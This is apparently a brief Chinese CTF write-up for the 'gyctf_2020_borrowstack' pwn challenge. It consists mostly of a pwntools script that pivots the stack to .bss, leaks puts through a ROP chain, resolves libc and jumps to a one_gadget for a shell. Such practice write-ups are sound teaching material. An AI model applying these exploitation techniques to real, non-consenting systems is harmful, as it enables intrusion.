看名字就知道栈迁移了 和以前那道题目有点像的
    image.png
    只有0x10的溢出,所以要栈迁移

    1. from pwn import*
    2. context.log_level = 'debug'
    3. io = remote("node4.buuoj.cn",29436)
    4. #io = process('./gyctf_2020_borrowstack')
    5. elf = ELF('./gyctf_2020_borrowstack')
    6. #gdb.attach(io)
    7. libc = ELF('libc-2.23.so')
    8. puts_plt = elf.plt['puts']
    9. puts_got = elf.got['puts']
    10. main_addr = elf.sym['main']
    11. leave_ret_addr = 0x00400699
    12. rdi_addr = 0x0000000000400703
    13. offest = 0x60
    14. bss_addr = 0x0000000000601090
    15. payload = b'a'*0x60 + p64(bss_addr)+p64(leave_ret_addr)
    16. io.recv()
    17. io.send(payload)
    18. io.recv()
    19. payload1=p64(0x4004c9)*0x14+p64(rdi_addr)+p64(puts_got)+p64(puts_plt)+p64(main_addr)
    20. io.sendline(payload1)
    21. puts_addr = u64(io.recvuntil('\x7f').ljust(8,'\x00'))
    22. log.success('puts_addr:'+hex(puts_addr))
    23. libcbase = puts_addr - libc.sym['puts']
    24. system_addr = libcbase +libc.sym['system']
    25. io.recv()
    26. payload = b'a'*0x60 + p64(system_addr)+p64(libcbase+0x4526a)
    27. io.send(payload)
    28. #pause()
    30. io.interactive()